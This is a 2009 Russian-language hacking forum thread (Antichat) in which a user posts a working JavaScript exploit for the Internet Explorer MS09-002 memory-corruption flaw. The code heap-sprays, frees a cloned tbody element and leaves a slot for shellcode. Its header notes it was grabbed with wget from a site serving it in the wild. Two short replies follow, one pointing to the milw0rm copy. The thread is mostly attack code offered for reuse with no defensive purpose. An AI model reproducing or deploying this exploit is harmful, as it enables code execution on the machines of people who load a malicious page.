ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Отказ в обслуживании в MS Internet Explorer (эксплоит, exploit)
  #1  
Старый 28.02.2009, 21:06
Аватар для Lucas
Lucas
Новичок
Регистрация: 27.10.2008
Сообщений: 15
Провел на форуме:
61952

Репутация: 17
Отправить сообщение для Lucas с помощью ICQ
По умолчанию Отказ в обслуживании в MS Internet Explorer (эксплоит, exploit)

Код:
<!--
MS09-002
===============================
grabbed from:
wget http://www.chengjitj.com/bbs/images/.../mm/jc/jc.html --user-agent="MSIE 7.0; Windows NT 5.1"

took a little but found it. /str0ke
-->

<script language="JavaScript">

var c="putyourshizhere-unescaped";

var array = new Array(); 

var ls = 0x100000-(c.length*2+0x01020); 

var b = unescape("%u0C0C%u0C0C"); 
while(b.length<ls/2) { b+=b;} 
var lh = b.substring(0,ls/2); 
delete b; 

for(i=0; i<0xC0; i++) { 
array[i] = lh + c;
} 

CollectGarbage();

var s1=unescape("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA ");
var a1 = new Array();
for(var x=0;x<1000;x++) a1.push(document.createElement("img"));

function ok() { 
o1=document.createElement("tbody"); 
o1.click; 
var o2 = o1.cloneNode(); 
o1.clearAttributes(); 
o1=null; CollectGarbage(); 
for(var x=0;x<a1.length;x++) a1[x].src=s1; 
o2.click;
}
</script><script>window.setTimeout("ok();",800);</script>
 
Ответить с цитированием

  #2  
Старый 28.02.2009, 22:04
Аватар для mailbrush
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Гуд, но если юзать отладчик - можно исправить =)
ПыСы: Остальные браузеры подглючивают...
 
Ответить с цитированием

  #3  
Старый 28.02.2009, 22:42
Аватар для oRb
oRb
Members of Antichat - Level 5
Регистрация: 09.05.2008
Сообщений: 304
Провел на форуме:
7875940

Репутация: 2362
По умолчанию

Мда, милворм уже копипастят.

Этот сплойт: http://milw0rm.com/exploits/8077
Остальные: http://milw0rm.com/search.php?dong=MS09-002
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Internet Explorer 7 [с обходом проверки] ~!DoK_tOR!~ Soft - Windows 0 25.01.2007 06:38
Microsoft выпустила русскоязычную версию Internet Explorer 7 Zek Мировые новости 6 24.11.2006 00:43
Internet Explorer 7 будет распространяться через автоматические обновления Dracula4ever Мировые новости 1 29.07.2006 12:21
Отказ в обслуживании в Microsoft Internet Explorer bul666 Мировые новости 5 30.12.2005 08:25



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ